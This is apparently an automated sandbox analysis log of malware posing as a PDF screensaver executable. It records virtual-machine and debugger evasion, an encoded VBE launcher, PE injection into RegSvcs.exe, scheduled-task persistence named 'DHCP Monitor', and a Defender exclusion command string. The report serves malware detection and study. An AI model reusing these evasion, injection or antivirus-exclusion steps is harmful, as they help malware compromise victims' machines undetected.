Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 9453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: foregroundWindowGot 1561 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe API coverage: 8.4 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer Jump to behavior
Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then#+
Source: ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exey
Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe
Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe:
Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe
Source: ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Thenzo
Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exe
Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exey
Source: RegSvcs.exe, 0000000A.00000002.769785143.0000000001067000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exe
Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exeb
Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThenYu8
Source: ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exee
Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then0
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exel
Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe536C7
Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exeV
Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe
Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: ihgsvw.exe, 00000015.00000003.383061801.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exeE97637D6
Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe
Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exed
Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EE6A3 VirtualQuery,GetSystemInfo, 0_2_003EE6A3
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_003DA69B
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_003EC220
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FB348 FindFirstFileExA, 0_2_003FB348
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00C0E387
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00C0D836
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00C1A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00C1A488
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose, 6_2_00C165F1
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDC642 FindFirstFileExW, 6_2_00BDC642
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 6_2_00C172E9
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C17248 FindFirstFileW,FindClose, 6_2_00C17248
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00BA5D78
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F7DEE mov eax, dword ptr fs:[00000030h] 0_2_003F7DEE
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC5078 mov eax, dword ptr fs:[00000030h] 6_2_00BC5078
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003EF838
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FC030 GetProcessHeap, 0_2_003FC030
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1F3FF BlockInput, 6_2_00C1F3FF
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF9D5 SetUnhandledExceptionFilter, 0_2_003EF9D5
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003EF838
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003EFBCA
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003F8EBD
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0D65 SetUnhandledExceptionFilter, 6_2_00BC0D65
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BD29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00BD29B2
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00BC0BCF
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00BC0FB1

HIPS / PFW / Operating System Protection Evasion
barindex
Starts an encoded Visual Basic Script (VBE)
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 5D7000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Contains functionality to query the security center for anti-virus and firewall products
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: select * from antivirusproducta32e83d//////8bd16a2ee83=zl
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de0fe3ac427d61269f,z}
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c61ef5a7537d61269f[zj
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de03e8ac4574770cjz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c61ef5a7537d61269fyz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c61ef5a7537d61269fhz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -command add-mppreference -exclusionpath /83c4/cffd/6gz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c700f2a5527d601aa0bce12357886fbb4f378ea10302
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\folder10_51tensi
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c70ae2a444794b787aaca0877a44687555378ea10302
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c61ef5a7537d61269fz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846dbb607175r.ktl<ym
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846da9657f750_51+yz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9db20eeab5f7c770ab38aea25559365ae7f7e49fae
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: binaryenc61ef5a7537d6ey
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ntunmapviewofsectiond6|y
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: user32.dll61ef5a7537d6sy
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ndowprocwjy
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sssssseplacee838/////ay
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: execquery\localhost\ro
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sexemodule61ef5a7537d6
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: virtualallocex
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: asmrylen
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iswow64process
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dword_ptrde0fe3ac427d6
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bufferasmetptr
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: binbufferetptrac427d6
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: byte[uctcreatea7537d6
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c71deeb255419xi
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kernel32.dll0xn
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: virtualallocex7xg
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dword_ptr.x|
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _crypt_decryptdatad ad\xj
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountincsxc
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountecjx
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_fixreloc adax
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountdecxx
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: displayname
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _crypt_derivekeydx
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %localappdata%\tempsk
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user~14 ad
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\syswow64w64
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea2beba94941
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %localappdata%\temp\k
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: majoroperatingsystemver
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: majorlinkerversionr<gj
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: addressofnewexeheader3gc
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de1ec28a69*gx
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: extendedregisters!gq
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberofsectionsaderxgv
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pointertosymboltable_go
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizeofoptionalheader
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: flagsvg
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segfsig
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: seggsbg
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segds
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: edi@x
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: esi@_p
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: edxh~
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ecx3a
